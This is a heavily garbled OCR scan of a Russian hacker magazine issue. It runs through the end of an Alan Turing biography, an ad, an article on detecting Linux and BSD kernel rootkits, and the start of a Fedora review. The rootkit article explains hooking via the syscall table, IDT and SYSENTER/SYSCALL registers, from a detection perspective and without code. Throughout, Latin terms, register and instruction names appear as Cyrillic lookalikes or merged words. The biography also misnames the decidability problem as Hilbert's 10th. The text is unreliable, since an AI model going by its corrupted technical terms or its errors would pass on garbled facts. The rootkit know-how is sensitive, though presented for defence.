Что, в прочем, не помешало ему в 1931 успешно поступить в Кембридж. И 
так уж совпало, что незадолго до этого внезапно скончался единственный 
близкий друг и единомышленник Алана — Кристофер Морком (СИ гізІорЬег 
Могсот). Для, мягко говоря, непопулярного среди ровесников Тьюринга 
это стало настоящим ударом. У него попросту не было друзей, с кем 
можно было бы поделиться мыслями, теориями, — и которые при этом не 
смотрели бы на него, как на чудака не от мира сего. Крис стал таким чело- 
веком, но ненадолго. После смерти друга ранее религиозный Тьюринг, 
разуверившись в боге, становится атеистом, и с этого момента его мысли 
занимают вещи совсем иного толка. Его интересуют строение и принципы 
работы человеческого мозга, и он подводит под них рациональную подоп- 
леку, ища ответы, например, в квантовой физике. Однако, даже спустя 



годы он продолжает верить, что человеческий Дух способен существовать 
и после смерти. Отказаться от уверенности в существовании загробной 
жизни Тьюринг сможет нескоро, но призрачная вера в то, что Крис еще «в 
какой-то степени жив», подтолкнет его к воистину революционным теори- 
ям и наработкам. 

Но мы забегаем вперед. Так как со стипендией в кембриджском Тринити- 
Колледже ничего не вышло, Тьюринг выбрал учебное заведение сам, 
остановившись на Кингз -колледже. Здесь он, наконец, попадает в свою 
колею и может с головой уйти в милые сердцу математику и квантовую 
физику. В те годы интерес к последней был велик, так что Тьюринг идет 
в ногу со временем, притом на передовой. Друзей у него по-прежнему 
практически нет, слишком уж странно он выглядит среди кембриджской 
элиты, со своими химическими опытами и эксцентричными манерами. 

Но здесь он хотя бы может отдаться любимому делу, чем и занимается, 
не особенно обращая внимание на окружающих. В 1934 он с отличием 
заканчивает четырехлетний курс обучения. Его диссертация по централь- 
ной предельной теореме удостаивается специальной премии, и в 1935-ом 
Тьюринга избирают в «товарищество» (МІоѵѵзЫр) Кингз -колледжа, что 
позволяет ему получать стипендию для последующего проведения науч- 
ных исследований и присваивает статус «где-то между аспирантурой и 
преподавательским корпусом». 

В последующие два года (1935-1936) у Тьюринга рождается концепт, 
увековечивший его имя в истории — та самая «машина Тьюринга», без 
которой сегодня не обходится ни один учебник по математическим осно- 
вам, логике и теории вычислений. К размышлениям на эту тему Тьюринга 
подталкивают посещенные в 34-ом году лекции Макса Ньюмана (Мах 
Ыеѵѵтап), где он впервые сталкивается с проблемой алгоритмической 
разрешимости, она же 10-я проблема Гильберта. Давид Гильберт сформу- 
лировал ее в 1900 году: возможно ли существование, хотя бы в принципе, 
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некоей универсальной алгоритмической процедуры (метода, или процес- 
са) для решения математических задач? Так как в то время даже точной 
формулировки алгоритма еще не было, Тьюринг подошел к решению 
вопроса комплексно. В результате этого и появилась его машина, «спо- 
собная самостоятельно изучать окружающий мир» — способ формали- 
зации понятия алгоритма ( ШрУЛъ.ѵѵікіресІіа.огд/ѵѵікі/Машина Тьюринга ), 
изучаемый ныне в любом нормальном вузе. «Машина» в данном ключе 
не является физическим объектом, это лишь обозначение, относящееся к 
абстрактной математике. Хотя в последствии, много лет спустя, она была 
реализована и на практике. 

Н «БОМБЫ» И ПЕРВЫЕ КОМПЬЮТЕРЫ 

После окончания Кембриджа Тьюринг проводит некоторое время в 
Принстоне, обучаясь у известного математика — Алонзо Черча (Аіопіо 
СЬигсИ). Успешно получив еще одну учебную степень, он возвращается 
в ставший уже родным Кембридж, и здесь его застает начало Второй 
мировой. Еще в 1938 Тьюринга пригласили к сотрудничеству с правитель- 
ственной Школой кодов и шифров, — теперь пришло время отдавать долг 
Родине. Тьюринг был чужд политике, и волнения, связанные с приходом 
Гитлера к власти, можно сказать, прошли мимо него. Зато коды, их взлом 
и дешифровка были ему интересны. Так что, когда перед «Школой» поста- 
вили конкретную задачу — разобраться с криптограммами, создаваемыми 
немецким электромеханическим устройством «Энигма», широко исполь- 
зовавшимся на флоте и авиации для передачи шифрованных радиограмм, 
Тьюринг воспринял это как увлекательную головоломку. Кстати, слово 
«Школа» взято в кавычки из-за того, что на деле заведение являлось сек- 
ретной лабораторией под эгидой британской разведки. 

Важность поставленной задачи была очевидна. Тьюринг совместно с кол- 
лективом других талантливых ученых разрабатывает «Бомбу» (ібе ВотЬе) 
— устройство, способное расшифровывать сигналы «Энигмы», что немцы 
считали «невозможным в принципе», даже если противник сумеет запо- 



лучить работающий экземпляр машины. Благодаря «Бомбе», союзные 
войска получили возможность читать немецкие шифровки и занимались 
этим большую часть 1941, в то время как противник даже не подозревал о 
том, что секретные сообщения перестали быть таковыми. Когда Германия, 
наконец, поняла, в чем дело — «Энигму» усложнили, но на взлом новой 
модели команде Тьюринга потребовалось порядка двух месяцев. Сам он, 
хотя и оставался куратором группы, практически не принимал в этом учас- 
тия, консультируя «взломщиков» в США. 

О работах Тьюринга был осведомлен сам Уинстон Черчилль, и в 1946 
ученого награждают Орденом Британской Империи «за жизненно важ- 
ный вклад в военные усилия». Во время разработки «Бомбы» Тьюринг 
приступает к созданию первых электронных устройств (все упомянутое 
выше скорее относилось к механике). А в 1945-м его приглашают в 
Национальную физическую лабораторию, где создается первая вычис- 
лительная машина. Там Тьюринг разрабатывает проект АСЕ (Аиіотабс 
СотриГтд Епдіпе — автоматического вычислительного устройства), кото- 
рый, по сути, описывает компьютер, таким, как мы знаем его сегодня. Но 
коллеги идей Тьюринга не разделяют и объявляют АСЕ «перебором во 
всех отношениях». Не в первый и не в последний раз Тьюринг опережает 
свое время. В 1947-м, разочарованный, он увольняется из физической 
лаборатории и вновь возвращается в Кембридж. В Университете Тьюринг 
продолжает заниматься математикой и психологией. Принципы работы и 
устройство человеческого мозга по-прежнему не дают ему покоя. 

В том же 47-ом по приглашению знакомого он приступает к работе лек- 
тором в Университете Манчестера, а также берется руководить тамошним 
проектом МАБАМ (МапсНезІег Аи*ота*іс Оідйаі МасЫпе). На этот раз все 
складывается лучше, чем с АСЕ. МАБАМ будет удачно завершена и станет 
одним из первых компьютеров в истории. Тьюринг покупает неподалеку 
от Манчестера дом и продолжает свои исследования. В 1950-м в жур- 
нале «МіпсІ» выходит статья под названием «Вычислительные машины 
и разум» (Сотрибпд тасЫпегу апб іпІеШдепсе), где он описывает «тест 
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Тьюринга». Тест призван проверить, разумен ли компьютер «в челове- 
ческом понимании» этого слова. Добавив проблеме свойственной ему 
четкости и конкретики, Тьюринг предложил заменить тестом абстрактные 
размышления «а может ли машина мыслить?» Смысл прост, как все 
гениальное: в течение определенного времени человек общается с двумя 
собеседниками, один их которых программа, а второй — человек. Задача 
судьи определить, кто есть кто, и если это не удается — машина справи- 
лась с заданием. А вообще, читателю журнала «][акер» стыдно не знать, 
что такое «тест Тьюринга» :]. Ученый предвидел: к 2000 году компьютер в 
30% случаев сможет успешно обманывать своих интервьюеров в течение 
5 минут. Также он предсказал, что в конечном счете машины смогут прой- 
ти его проверку. Пока ни одной программе это не удалось даже близко, но 
соревнования проводятся каждый год. 

Проект МАБАМ тем временем продолжал развиваться, и, как его логичес- 
кое продолжение, в строй ввели компьютер МапсИезІег Магк I. Тьюринг, 
в числе прочего, занимался математической биологией — построением 
математических моделей биологических процессов, в частности — мор- 
фогенезом. Для своих экспериментов он использовал рабочие мощнос- 
ти Магк I. Впрочем, не оставлял без внимания и квантовую физику, 
увлекся теориями Юнга, а в 1952 в нем внезапно проснулась страсть к 
Скандинавии и всему с нею связанному. 

Н ЗАКАТ 

Неизвестно как бы все развивалось, и сколько еще инновационных тео- 
рий и открытий подарил бы нам гений Тьюринга, если бы в Англии не 
начались активные преследования «неблагонадежных» граждан. Тьюринг 
всегда плохо вписывался в рамки, но имелась еще одна, более серьез- 
ная, проблема. Он был геем. В то время у Британской империи на воору- 
жении даже имелся закон, официально запрещающий гомосексуальные 
акты, а гомосексуализм был объявлен психическим заболеванием. 

Все вскрылось в результате банального ограбления. Дом Тьюринга 
подвергся краже со взломом. В ходе расследования полиция выявила 
некоторые «интересные детали» относительно самого ученого. Тьюрингу 
незамедлительно предъявляют обвинение в крайне непристойном пове- 
дении. То же самое, что получил Оскар Уайльд пятьдесят лет назад. 

Суд состоялся 31 марта 1953 года. Тьюринг даже не пытался защищаться, 
заявив, что ничего противозаконного в своих деяниях не видит. Его при- 
знают виновным и, согласно законам тех лет, предлагают выбор — либо 



тюремное заключение, либо гормональная терапия (регулярные инъек- 
ции женского гормона эстрогена), что, по сути, является химической кас- 
трацией. Тьюринг выбирает второе. В прессе поднимается шумиха и из 
дела раздувают большой, показательный скандал. Фактически, Тьюринга 
просто втаптывают в грязь. Из-за шумной огласки его лишают доступа к 
работе с секретной информацией и увольняют из Департамента кодов, с 
которым он продолжал сотрудничать все эти годы. 

Он продолжает преподавать в Манчестере. Нельзя сказать, что коллеги 
настроены к нему враждебно, но и особой теплоты тоже нет. Тьюринг 
опозорен, постоянные «процедуры» унижают его, а царящая вокруг обста- 
новка угнетает. Он пытается искать работы во Франции, но поиски не 
приносят успеха. К тому же, любой выезд Тьюринга заграницу становится 
настоящим кошмаром для разведки. Он слишком много знает, и секрет- 
ным службам трудно поверить в то, что его друзья и знакомые по всему 
миру едва ли осведомлены о том, чем он занимается. Тьюринга держат 
«под колпаком» — за ним самим и за его друзьями следят. 

Печальная развязка этой истории наступаете июня 1954 года. Алан 
Тьюринг найден мертвым в собственном доме в Вилмслоу. Согласно 
официальной версии — это было самоубийство. Экспертиза установила, 
что где-то сутки тому назад он принял летальную дозу цианида. Так как 
рядом с телом обнаружили надкушенное яблоко, буквально накачанное 
этим ядом, это только подтвердило версию полиции. Многие не поверили, 
многие не согласились. Мать, никогда впрочем, не бывшая с ним близка, 
настаивала на том, что Тьюринг всегда был неосторожен со своими хими- 
ческими опытами, и говорила о несчастном случае. Также говорили об 
убийстве — Тьюринг для спецслужб был форменным бельмом на глазу. 
Увы, правду мы вряд ли когда-нибудь узнаем. 

А признание к ученому пришло лишь годы спустя. Так, в 1966-м учредили 
премию Тьюринга. В 70-е подняли его записи, и, пожалуй, только тогда 
была по-настоящему оценена их важность и революционность. Посмертно 
Тьюринга награждали всевозможными премиями. В 1996-м шоссе А6010, 
что в Манчестере, переименовали в «Путь Алана Тьюринга» (Аіап Тигіпд 
ѴѴау), словно отдавая дань его уникальному и яркому жизненному пути. 

А в 2001 ему поставили памятник в Саквилль парке, рядом с универси- 
тетом Манчестера. И так далее, и так далее. Мемориальным табличкам 
нет числа, его имя стало почти нарицательным, а работы — фундаментом 
новых направлений науки. Чертовски верна старая поговорка, гласящая: 
«что имеем, не храним, а потерявши плачем», не 



► 074 



ХАКЕР 07 /115/ 08 









Если при нажатии 
на кнопку двигатель 
не завелся - срочно 
купите журнал й®ак» 



|3 








!■ ЩЛ 




№1 






^ сцена 



РАБОЧИЕ МЕСТА 



ЕШШШШ 
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в ПОИСКАХ 
ШАПКИ-НЁВИДЙМКИ 



ОБНАРУЖЕН И Е КОМПРОМЕТАЦИИ ЯДЕР ЫИЦХ И Х В5Р, ИЛ И РУТКИТЫТОЖЕ| 
ОСТАВЛЯЮТ СЛЕДЫ... 




Рост популяции руткитов, оккупировавших никсы, продолж ается 
ми темпами. Они поражают системы, і^юу^^^е^^^^^^гавирусами и 
прочими защитными механизмами, к оторые уже давно стал и привычными 
средствами обороны в мире ѴѴіпсіоѵѵб. і^^^^^щжходится выдумывать 
что-то концептуальное. 




огласно общепринятой классификации, руткитами называ- 
ютпрограммы (обычно безвредные), предназначенные для 
сокрытия сетевых соединений, процессов и дисковых файлов, 
а также других программ, чаще всего довольно агрессивных 
по натуре (чего им тогда шифроваться, спрашивается). Классификация 
— это прекрасно, но на практике нам приходится бороться не с руткитами 
в чистом виде (тоже мне, понимаешь, сферические кони в вакууме), а с 
различными механизмами маскировки. Огромное количество червей (и 
прочей мал вари) имеет встроенные руткиты с полиморфным движком. По- 
этому условимся понимать под руткитами любую нечисть, занимающуюся 
сокрытием системных объектов (файлов, процессов, сетевых соединений). 



Своих или чужих — неважно. Попробуем разобраться — какже работает эта 
шапка-невидимка, и какие способы обнаружения руткитов существуют. 

Н КОЧЕВЫЕ ПЛЕМЕНА ПРОТИВ ОСЕДЛЫХ ФОРМ ЖИЗНИ 

Существуют два типа руткитов: первые, внедряясь в систему, создают 
новые файлы или модифицируют уже существующие, получая управле- 
ние при каждой загрузке операционной системы. Другие же — вообще 
не прикасаются кдиску, не создают новых процессов, ограничиваясь 
модификацией оперативной памяти. Естественно, руткиты такоготипа 
умирают при перезагрузке и выглядят не сл и ш ком -то жизнеспособными, 
однако до тех пор, пока дыра, через которую проникает руткит, остается не 
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залатанной, он будет приходить вновь и вновь. Закрытие дыры 
мало чего изменит, ведьтам, где есть одна дыра, найдутся и 
другие — создателю руткита достаточно переписать несколько 
десятков строк кода, ответственных за внедрение первичного 
загрузчика в целевую систему, — и дело сделано. 

В распределенных сетях (ботнетах] перезагрузка одного или 
нескольких узлов — вообще не проблема, ктомуже после пере- 
загрузки узел будет инфицирован вновь. Этотфакточеньтрудно 
обнаружить, ведь никаких изменений на диске нет! Асетевые 
соединения современные руткиты скрываютвесьма эффектив- 
но. Прошли те времена, когда открытые порты обнаруживались 
тривиальным сканированием ссоседней машины. Продвинутые 
руткиты не открывают никаких портов. Они садятся на сетевой 
интерфейс, контролируя трафик и модифицируя определенные 
поля взаголовкахТСР/ІР-пакетов, значения которых согласно 
РРС выбираются случайным образом. Скремблер скроет факт 
модификации (независимоотпередаваемых руткитом данных 
мы получим та кое же хаотичное распределение, каки на неза- 
раженной машине), а несимметричный шифратор предотвратит 
декодирование перехваченной информации. Даже если мы 
заведомо знаем, что руткитесть! 

Откуда мы узнаем, что он есть? Объем трафика в норме, 
никаких изменений на диске не наблюдается (что кардиналь- 
ным образом отличается от руткитов первоготипа, которые 
обнаруживаются настолько тривиально, насколько это 
можно себе представить). Загружаемся с ЫѵеСО и проверяем 
контрольные суммы всех файлов (или просто осуществляем 
побайтовое сравнение с дистрибутивом). Конечно, для сер- 
веровтакой способ не очень-то пригоден — их вообще лучше 
не перезагружать, но сервера, критичные к перезагрузкам, 
обычно оснащены ПАЮ- массива ми с Иоіъріид’ом. Та к что 
просто вытаскиваем один набор дисков из матрицы, ставим 
его на другую машину, проверяем контрольную сумму и делаем 
оргвыводы. 

Короче говоря, руткиты, вносящие изменения в файловую 
систему, нам неинтересны, и дальше мы будем говорить ис- 
ключительно озаразе, обитающей непосредственно в опера- 
тивной памяти и получающей управление путем модификации 
ядра (поскольку на прикладном уровне нормальному руткиту 
делать нечего). 

Н МЕТОДЫ БОРЬБЫ, ИЛИ БЫЛА Б КАТАНА — 

СДЕЛАЛ БЫ ХАРАКИРИ 

Прежде чем продвигаться вглубь, сразу выбросим на помойку 
несколько популярных, но безнадежно устаревших способов 
борьбы с руткитами. Чтение памяти ядра через /йеѵ/ [к]шеш 



(при активом рутките!) — это курам на смех. Поиск следов 
компрометации при помощи ѲОВ — изтойже оперы. Руткиту 
ничего не стоит отследить обращение к любому файлу/уст- 
ройству, «вычистив» следы своего пребывания или совер- 
шить «харакири» при запуске 60В. Чуть сложнее — ввести 
в заблуждение 60В, оставаясь при этом активным, живым и 
здоровым. 

Достойных отладчиков ядерного уровня под никсы не сущест- 
вует. Ну, нето, чтобы совсем нет, но в штатный комплект пос- 
тавки ужточно ни один не входит. Хорошо еще, если установка 
отладчика нетребует перекомпиляции ядра, не говоря уже о 
перезагрузке. Самихже отладчиковдовольно много: ЫИКО, 
КОВ, Ыпісе, РОВ, и ни один из них не обладает неоспоримыми 
преимуществами перед остальными. Кстати, для ловли рутки- 
тов иметь готовый купотреблению отладчик необязательно. 
Достаточно написать загружаемый модуль ядра, считываю- 
щий и передающий на прикладной уровень все критичные к 
перехвату структуры данных вместе с машинным кодом (ес- 
тественно, ядро должно быть скомпилировано с поддержкой 
модульности). Что это за данные — мы сейчас выясним. 

Н МАГИЧЕСКИЕ АББРЕВИАТУРЫ — СОТ, ЮТ, ШТ 

Сокрытие чего бы там ни было базируется на перехвате/моди- 
фикации ядерных структур данных/системного кода. Способов 
перехвата придумано множество, и каждый день появляются 
новые. Однако количество самих системных структур ограни- 
чено, что существенноупрощаетборьбу сзаразой. 

Начнем с простого. С таблиц глобальных/локальныхде- 
скрипторов (ОІоЬаІ/ЕосаІ Оевспрбоп ТаЫе или, сокращенно, 
60Т/ЮТ), хранящихбазовыеадреса, лимиты и атрибуты 
селекторов. Чем они могут помочь руткиту? Ну, кое-чем могут. 
Ыпих/хВЗВ используют плоскую модель памяти, при которой 
селекторы С5 (код), 05 (данные) и 55 (стек) «распахнуты» на 
все адресное пространство: от нуля до самых верхних его 
окраин. Создание нового селектора с базой, отличной от нуля, 
с последующей его загрузкой в один из сегментных регист- 
ров существенно затрудняетдизассемблирование руткита, 
особеннотех экземпляров, что выдраны из памяти чужой 
машины. Таблицы дескрипторов в распоряжении реверсера 
нет и не будет (руткитумер). Грубо говоря, мы вообще не можем 
определить, к каким данным осуществляется обращение, 
ведь база селектора неизвестна! Реверсеров и сотрудников 
антивирусных компаний такие руткиты просто доводят до 
бешенства, затягивая анализ, а вместе с ним и приготовление 
«вакцины». 

Побочным эффектом этого антиотладочного приема стано- 
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• Перехват систем- 
ного вызова 5ув_геасІ 
позволяет руткиту 
контролировать 
обращения ко всем 
файлам, устройствам 
и псевдоустройствам. 

• Начиная с версии 
2.5, ядро Ыпих под- 
держивает механизм 
быстрых системных 
вызовов, реализу- 
емый командами 
5У5ЕЫТЕН/5У5ЕХІТ 
(Іпіеі) и 5У5САИ/ 
5У5РЕТ (АМИ). сущес- 
твен но облегчающий 
перехват и делающий 
его труднозаметным. 

• Продвинутые 
руткиты не открывают 
никаких портов, они 
садятся на сетевой 
интерфейс, контроли- 
руя трафик 

и модифицируя опре- 
деленные поля 
в заголовках ТСР/ІР- 
пакетов. 
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нового поколения 



вится появление новых селекторов в таблице дескрипторов, которыхтам 
никогда не наблюдалось ранее. Отладчики ядерного уровня позволяют 
просматривать таблицы дескрипторов в удобочитаемом виде, но при 
активном рутките пользоваться отладчиком не рекомендуется. Лучше напи- 
сать свой загружаемый модуль ядра, считывающий содержимоетаблицы 
дескрипторов командами 560Т/5І_0Т, описанными (вместе с форматами 
самихтаблиц) в документации на процессоры Іпіеіи АМР. 

Огромное количество руткитов модифицируеттаблицу дескрипторов 
прерываний (Іпіеггирі Оезсгірбоп ТаЫе или, сокращенно, ЮТ), позволя- 
ющую им перехватыватьлюбые прерывания и исключения, втом числе 
и системные вызовы, реализованные на некоторых системах именно как 
прерывания. Но о сисколлах мы еще поговорим, а пока лишь отметим, что 
модификация ЮТ позволяет руткиту перехватывать обращения кстрани- 
цам, вытесненным на диск(при обращении кним возникает исключение 
Раде Раиіі). Атакже перехватывать другие исключения, например, общее 
исключение защиты (бепегаі Ргоіесбоп Еаиіі), отладочное и пошаговое 
исключение (отличный способ борьбы с отладчиками), не говоря уже о 
прерываниях, поступающих отаппаратныхустройств — клавиатуры, сете- 
вой карты и прочего оборудования, прямое обращение ккоторому очень 
полезно для сокрытия «преступной» деятельности. 

Таблица прерываний, отображаемая отладчиками в удобочитаемом виде, 
можетбыть прочитана процессорной командой ЗІБТ, что намного надеж- 
нее, поскольку перехватить ее выполнение руткитуже не в состоянии. 

В ПРАКТИЧЕСКАЯ МАГИЯ СИСТЕМНЫХ ВЫЗОВОВ 

Системные вызовы — основной механизм взаимодействия ядра с 
прикладными процессами, обеспечивающий базовый функционал и 
абстрагирующий приложения от особенностей конкретного оборудова- 
ния. В частности, системный вызов зу5_геаб обеспечиваетунифициро- 
ванный способ чтения данных из файлов, устройств и псевдоустройств. 
Соответственно, перехват 5уз_геаб позволяет руткиту контролировать 
обращения ко всем файлам и (псевдо)устройствам. Даже если руткит 
не создает и не скрывает никаких файлов, ему необходимо заблоки- 
ровать возможность чтения памяти ядра, иначе любой, даже самый 
примитивный антивирус тут же его обнаружит. 

В зависимости оттипа и версии ОС системные вызовы реализуются по- 
разному. Самый древний механизм — это далекий вызов по селектору 
семь, смещение ноль — САЬЬ РАК 00071т: 00000000К (или, то же са- 
мое, но в АТ&Т синтаксисе — Ісаіі $7 , $0). Он работает практически 
на всех х86- клонах II N ІХ’а, однако практического значения не имеет, 
поскольку им пользуются только некоторые ассемблерные программы в 
стиле «бе Но, ѵѵогісі!», ну и... вирусы, также написанные на ассемблере. 
Стандартом де-факто стал программный вызов прерывания 801т (шт 
801т), работающий как в Ыпих, так и во ЕгееВЗО. Как руткитего может 



перехватить? Посредством модификации таблицы дескрипторов пре- 
рываний, переназначая вектор 806 на свой собственный код. Однако это 
не единственный вариант. Стандартно шт 80Ъ. передаетуправление 
на функцию зузЬет_са11, адрес которой можно определить по файлу 
Зузіет.тар, если он, конечно, не удален администратором по соображе- 
ниям безопасности, —тогда руткитлибо читает вектор 801т через ЗІЬТ, 
либо находит 5у5іет_са [[ эвристическим путем, поскольку она, как и 
любой другой обработчик прерывания, содержит довольно характерный 
код. Вставив в начало (или середину) этой функции команду перехода 
на свое тело, руткит будет получать управление при всяком системном 
вызове. Следовательно, мы должны считать код функции зузЬет_са11 
из памяти, сравнив его с оригиналом, который можно позаимствовать 
из неупакованного ядра, выдернутого из дистрибутивного диска (какэто 
сделать, мы уже неоднократно рассказывали). 

После выполнения системного вызова управление получает другая 
интересная функция — геЦ_Сгош_зуз_са11, идущая следом за 
5у5іепп_саЦ и также, как и 5у5іет_саІ[, присутствующая в Бузует. тар. 
Ее перехватывают многие руткиты, что вполне логично, поскольку 
«вычистить» следы своего пребывания лучше всего после отработки 
системного вызова (а не до него). Популярные руководства по поиску 
руткитов об этом почему-то забывают, а зря! Функцию геС_Сгош_зуз_ 
саіі следует проверять в первую очередь, сравнивая ее код с кодом 
оригинальной геЦ_бгош_зуз_са11, ну или просто дизассемблируя 
его на предмет наличия посторонних переходов. 

Начиная с версии 2.5, ядро Ыпих поддерживает механизм быстрых 
системных вызовов, реализуемый командами ЗУЗЕЫТЕК./ЗУЗЕХІТ ( I піеі) 
и ЗУЗСАЬЬ/ ЗУЗЕЕТ (АМО). Он существенно облегчает перехват и делает 
его труднозаметным. Команда ЗУЗЕЫТЕК. передаетуправление сЗ-го 
кольца прикладного уровня на ядерный уровень, используя специальные 
МЗП-регистры, а конкретно: ІА32_ЗУЗЕЖ'ЕК_СЗ содержит селектор 
целевого сегмента, ІА32_ЗУЗЕЫТЕЕ_ЕІР — целевой адрес перехода, 
1А32 _зузе№ГЕК_езр — новое значение регистра Е5Р при переходе на 
ядерный уровень. При этом селектор стека равняется ( іа32_зузеегтек_ 
СЗ + 081т) . ЗУЗСАЬЬ работает практически аналогичным образом, только 
МЗП-регистры другие: ЗТАК, ЬЗТАК и СЗТАК (подробнее об этом можно 
прочитать в описании самой команды ЗУЗСАЬЬ в спецификации отАМй, 
ну или отіпіеі, сучетом, чтоона поддерживает эту команду втой же манере, 
в какой АМй поддерживает ЗУЗЕЫТЕР). 

Суть в том, что целостность М 5 Р- регистров долгое время никто не 
проверял — чем руткиты суспехом и воспользовались, изменяя М5Р- 
регистры таким образом, чтобы управление получал не системный 
обработчик, а код руткита со всеми вытекающими отсюда последствиями. 
Далеко не все отладчики отображают содержание М5Р-регистров. Но это 
легко осуществить с ядерного уровня командой ЕБМЗЕ, которую руткит 
также не может перехватить, а потому все его махинации с М5Р-регист- 
рами будут немедленного разоблачены. Естественно, помимо проверки 
М5Р-регистров (они должны указывать натотже системный обработчик, 
что и в заведомо неинфицированной системе стой же самой версией ядра), 
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Тема сокрытия трафи- 
ка подробно изложена 
Жанной Рутковской, 
так что не будем пов- 
торять уже сказанное, 
а просто откроем 
ее блог и почитаем: 
іЬеіпѵівіЫеіЫпдз. 
ЫодвроСсот . 



мы должны проверить код самого обработчика. Он можетбыть изменен 
руткитом для перехвата управления без модификации МЭР (впрочем, одно 
другому не мешает, и многие руткиты используют гибридный вариант). 
Поддержка ЗУЗЕЫТЕК/ЗУЗСАЬЬ не отменяет I N1 80Ь, по-прежнему 
присутствующую в ядре и вызываемую из старых прикладных библиотек 
некоторых ассемблерных программ, ну и, конечно, вирусов, работающих на 
прикладном уровне! Так что руткитам теперь приходится перехватывать и 
то, и другое, хотя перехват ЗУЗЕЫТЕЕ/ЗУЗСАЬЬ намного более перспекти- 
вен (ІКІТ 80И используется все реже и реже). 

А вот разработчики РгееВЗИ от ІЫТ 8 01т отказываться пока не соби- 
раются, и хотя существует патч от ОаѵісГа Хи, написанный в конце 2002 
года и переводящий систему на зузектее/зузсаьь [ реорІеТгееЬзб. 
огдХ—сІаѵісІхи/зузепІіег/ ) . поумолчанию он не включен в стабильный релиз. 
Впрочем, сторонние составители дистрибутивов его активно используют 
(взять, к примеру, ОгадопРІуВЗО). 

Н МОДИФИКАЦИЯ ТАБЛИЦЫ системных вызовов 

Указатели на системные вызовы перечислены втаблице 5у5_саІІ_іаЫе, 
адрес которой можно найти все втом же Зузіет.ппар или вычислить 
эвристическим путем (удалениеЗузІет.тар’а не слишком-то усиливает 
безопасность). 

Подмена указателя на оригинальный системный вызов указателем на код 
руткита — это классика перехвата. Элементарно обнаруживается путем 
сравнения оригинальной таблицы системных вызовов, выдернутой из 
неупакованного ядра дизассемблером, с ее «живой» сестрицей, прочи- 
тать которую можно либо отладчиком, либо «руками» — командой тоѵ, 
вызываемой из загружаемого модуля ядра. Оба способа абсолютно нена- 
дежны и выявляюттолько пионерские руткиты. «Зверюшки» посерьезнее 
сбрасывают страницы, при надлежащие таблице системных вызовов, в 
Ш_АССЕЗЗ. В результате, при обращении к ним процессор выбрасывает 
исключение, подхватываемое руткитом, который смотрит, откуда пришел 
вызов на чтение — если это функция зузіет_саи, то все ОК, если же нет, 
то руткит возвращает подложные данные, итаблица системных вызовов 
выглядит, каксама невинность. Конечно, перед чтением можно прове- 
рить атрибуты страницы, но весьфокус втом, что функция определения 



— это полный отстой, написанный пионерами и об- 
наруживаемый по нестабильному поведению системы. Остальные 
ю% — что-то более или менее стоящее со сложностью обнаруже- 
ния, варьирующейся от «элементарно» до «практически невоз- 
можно». И чтобы не отстать от прогресса, необходимо постоянно 
отлавливать свежие руткиты, анализируя их. 




5У5САИ и используемые им МБР-регистры 



атрибутов страниц реализована каксистемный вызов, находящийся втой 
же самой таблице, контролируемой руткитом. Упс! Приехали! Ладно, перед 
чтением мы назначим свой собственный обработчик исключений, который 
выручит настолько втом случае, если руткит не модифицировал ЮТ. 
Решение заключается в «ручном» разборе страничного каталога, формат 
которого описан в руководствах по системному программированию на 
процессоры ІпіеІ/АМО и представляетсобой намного более простую задачу, 
чем это кажется поначалу. 

Естественно, крометаблицы системных вызовов необходимо проверить 
и целостность самих системных вызовов, помня отом, что руткиты могут 
внедрять команду перехода на своетело нетолько в начало функции 
системного вызова, нотакже в ее конец или середину, хотя для этого им 
придется тащить за собой дизассемблер длин инструкций. Тем не менее, 
«серединный перехват» — стандарт де-фа кто для всех серьезных руткитов. 

Н ДАЙТЕ МНЕ МЫЛО, ВЕРЕВКУ ИЛИ... ДРОПЕР! 

Сотрудники антивирусных компаний получают вирусы/ руткиты изтрех 
основных источников. Первый — свои собственные НопеуРоЕы, второй 
— малварь, присланная коллегами (другими антивирусными компаниями), 
третий (самый плодотворный) — файлы, полученные от пользователей. 

В какой-то момент вирусописателям надоело, что ихтворения разносят в 
пух и прах за считанные дни, когда на создание руткита и его отладку уходят 
многие недели — обидно, да? Вотони и стали искать пути, какзатруднить 
анализ мал вари, и ведь нашли! Специальная программа, называемая 
дропером (от английского До бгор - бросать), «сбрасывает» основное 
тело малвари на целевой компьютер, при этом оно шифруется ключом, 
сгенерированным на основе данных о конфигурации системы, и наружу 
«торчит» только расшифровщик (зачастую, полиморфный). Как нетрудно 
догадаться, малварьтакого вида работает толь ко на том компьютере, на 
который она попала «естественным» путем, а всякая попытка запуска ее на 
другой машине ничего не дает! Ничего, абсолютно! 

Чтобы проанализировать малварь, необходимо вместе с ней получить 
данные о конфигурации, что довольно затруднительно. Поэтому остается 
только искать дропер, то естьждать, пока малварь не влипнет в НопеуРоС 
принадлежащий реверсеру или одному из его партнеров. ЦС 
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Приятно, когда разработчики придерживаются собственноручно состав- 
ленных планов, не откладывая выход релизов. А когда выпущенный про- 
дукт действительно превосходит предыдущий и не содержит досадных і 
багов — это вдвойне отрадно. В середине мая на наш суд был предст^лен 
очередной релиз популярного дистрибутива Ресіога, получи^^ш^^довое 
имя ЗиІрЬиг (Сера). Сможет ли Сульфур обойти агрессивного Оборотня 
СѴѴегеѵѵоІГ)? 



і 



Н ВСЕ ДЕЛО В ШЛЯПЕ 

Как известно, Ресіога КесІогаргоіесЕогд ) произошла от РебНаі: — одного 
из самых старых дистрибутивов, успешно дожившего до наших дней и не 
утратившего своей популярности. Проект, основанный в 1994 году Бобом 
Янгом и Марком Юингом, практически сразу привлек внимание пакетной 
системой грт. Она предлагала пользователям простые пути установки, 
обновления и удаления программ без их компиляции. Изначально дистри- 
бутив был ориентирован и на десктопы, и на серверы, а разделение проекта 
произошло в 2003-ем. Ставшее ктому времени уже известным имя РебНаІ 
закрепилосьза коммерческой системой РебНаІ: Епіегргізе І_іпих (ННЕІ_). 
Пользовательский вариант получил название Еебога Соге. В связи стем, 
что репозитарии Соге и Ехігаз с версии 7 были объединены, дистрибутив 
стал называться просто Еебога. 

На первых порах бытовало мнение, что лишившись поддержки РебНаЕ 
свободный проект долго не протянет. Но релизы дистрибутива стабильно 
выходили раз-два в год, и постепенно вокруг Еебога выросло большое 
ком ью нити. Удобный инсталлятор Апасопба, пакетная система и програм- 



мы настройки, перекочевавшие из родительского дистрибутива, были при- 
знаны одними из лучших. Поэтому без пользователей Еебога не осталась. 
По данным ѴѴІкі-проекта, где приводится статистика загрузок и установок 
КебогаргощсЕогдА/ѵікі/ВіаЕзЕсз І. за полгода Еебога 8установили 2,2 мил- 
лиона человек. Проект поддерживает 2000 активныхучастников. Примерно 
600 из них собирали пакеты для нового релиза. 

